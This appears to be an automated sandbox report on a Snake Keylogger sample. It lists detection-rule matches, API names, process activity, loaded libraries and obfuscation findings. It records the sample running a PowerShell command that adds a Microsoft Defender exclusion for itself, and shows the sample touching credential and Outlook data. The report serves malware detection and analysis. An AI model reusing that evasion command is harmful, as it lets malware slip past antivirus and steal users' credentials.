            Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 2924, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 2924, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 4040, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 4040, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, lXmeKmPdTaDsuhOP4M.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, lXmeKmPdTaDsuhOP4M.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, lXmeKmPdTaDsuhOP4M.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, Se7yaxeobBMdUHx8Vi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, Se7yaxeobBMdUHx8Vi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, lXmeKmPdTaDsuhOP4M.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, lXmeKmPdTaDsuhOP4M.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, lXmeKmPdTaDsuhOP4M.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, lXmeKmPdTaDsuhOP4M.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, lXmeKmPdTaDsuhOP4M.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, lXmeKmPdTaDsuhOP4M.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, Se7yaxeobBMdUHx8Vi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@3/3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.logJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeMutant created: \Sessions\1\BaseNamedObjects\tiqdbrBawfEtCyhplyRgDXJO
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2640:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etzjvjg0.wmm.ps1Jump to behavior
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C05000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3270967957.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002BF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeVirustotal: Detection: 28%
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: PHCd.pdbSHA256 source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: Binary string: PHCd.pdb source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, frmMain.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, lXmeKmPdTaDsuhOP4M.cs.Net Code: yj6dS9kw0f System.Reflection.Assembly.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, lXmeKmPdTaDsuhOP4M.cs.Net Code: yj6dS9kw0f System.Reflection.Assembly.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.5180000.5.raw.unpack, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.5180000.5.raw.unpack, PingPong.cs.Net Code: Justy
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.26c7c54.0.raw.unpack, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.26c7c54.0.raw.unpack, PingPong.cs.Net Code: Justy
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, lXmeKmPdTaDsuhOP4M.cs.Net Code: yj6dS9kw0f System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_0267E130 push 08418B02h; ret 0_2_0267E143
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_0267E841 push 14418B02h; ret 0_2_0267E853
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_0267D238 push eax; iretd 0_2_0267D241
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_0267F090 push 1C418B02h; ret 0_2_0267F0A3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_0267F421 push 20418B02h; ret 0_2_0267F413
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_0267DC20 push 08518902h; ret 0_2_0267DC33
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_06ADDC56 push es; ret 0_2_06ADDC58
